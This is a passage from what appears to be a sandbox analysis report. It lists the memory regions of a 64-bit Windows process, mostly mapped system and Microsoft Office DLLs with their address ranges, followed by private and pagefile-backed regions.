(normalized: "c:\\windows\\system32\\webio.dll") Region: id = 284 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 285 start_va = 0x7fef8370000 end_va = 0x7fef8559fff entry_point = 0x7fef8370000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 286 start_va = 0x7fef8560000 end_va = 0x7fef8799fff entry_point = 0x7fef8560000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 287 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 288 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 289 start_va = 0x7fef9300000 end_va = 0x7fef9310fff entry_point = 0x7fef9300000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 290 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 291 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 292 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 293 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 294 start_va = 0x7fef9810000 end_va = 0x7fef98b6fff entry_point = 0x7fef9810000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 295 start_va = 0x7fef98c0000 end_va = 0x7fef9914fff entry_point = 0x7fef98c0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 296 start_va = 0x7fef9920000 end_va = 0x7fef9953fff entry_point = 0x7fef9920000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 297 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 298 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 299 start_va = 0x7fefaa80000 end_va = 0x7fefaa82fff entry_point = 0x7fefaa80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 300 start_va = 0x7fefaa90000 end_va = 0x7fefaa92fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 301 start_va = 0x7fefaaa0000 end_va = 0x7fefaaa2fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 302 start_va = 0x7fefaab0000 end_va = 0x7fefaab2fff entry_point = 0x7fefaab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 303 start_va = 0x7fefaac0000 end_va = 0x7fefaac4fff entry_point = 0x7fefaac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 304 start_va = 0x7fefaad0000 end_va = 0x7fefaad4fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 305 start_va = 0x7fefaae0000 end_va = 0x7fefaae2fff entry_point = 0x7fefaae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 306 start_va = 0x7fefab90000 end_va = 0x7fefab93fff entry_point = 0x7fefab90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 307 start_va = 0x7fefaba0000 end_va = 0x7fefaba3fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 308 start_va = 0x7fefabb0000 end_va = 0x7fefabb2fff entry_point = 0x7fefabb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 309 start_va = 0x7fefabc0000 end_va = 0x7fefabc3fff entry_point = 0x7fefabc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 310 start_va = 0x7fefabd0000 end_va = 0x7fefabd2fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 311 start_va = 0x7fefabe0000 end_va = 0x7fefabe2fff entry_point = 0x7fefabe0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 312 start_va = 0x7fefabf0000 end_va = 0x7fefabf2fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 313 start_va = 0x7fefac00000 end_va = 0x7fefac02fff entry_point = 0x7fefac00000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 314 start_va = 0x7fefac10000 end_va = 0x7fefac12fff entry_point = 0x7fefac10000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 315 start_va = 0x7fefac20000 end_va = 0x7fefac22fff entry_point = 0x7fefac20000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 316 start_va = 0x7fefac30000 end_va = 0x7fefad21fff entry_point = 0x7fefac30000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 317 start_va = 0x7fefad30000 end_va = 0x7fefad33fff entry_point = 0x7fefad30000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 318 start_va = 0x7fefad40000 end_va = 0x7fefad55fff entry_point = 0x7fefad40000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 319 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 320 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 321 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 322 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 323 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 324 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 325 start_va = 0x7fefbd80000 end_va = 0x7fefbd94fff entry_point = 0x7fefbd80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 326 start_va = 0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 327 start_va = 0x7fefbdb0000 end_va = 0x7fefbdc5fff entry_point = 0x7fefbdb0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 328 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 329 start_va = 0x7fefbf10000 end_va = 0x7fefc039fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 330 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 331 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 332 start_va = 0x7fefc290000 end_va = 0x7fefc4a4fff entry_point = 0x7fefc290000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 333 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 334 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 335 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 336 start_va = 0x7fefcb80000 end_va = 0x7fefcbabfff entry_point = 0x7fefcb80000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 337 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 338 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 339 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 340 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 341 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 342 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 343 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 344 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 345 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 346 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 347 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 348 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 349 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 350 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 351 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 352 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 353 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 354 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 355 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 356 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 357 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 358 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 359 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 360 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 361 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 362 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 363 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 364 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 365 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 366 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 367 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 368 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 369 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 370 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 371 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 372 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 373 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 374 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 375 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 376 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 377 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 378 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 379 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 380 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 381 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 382 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 383 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 384 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 385 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 386 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 387 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 388 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 389 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 390 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 391 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 392 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 393 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 394 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 395 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 396 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 397 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 398 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 399 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 400 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 401 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 402 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = 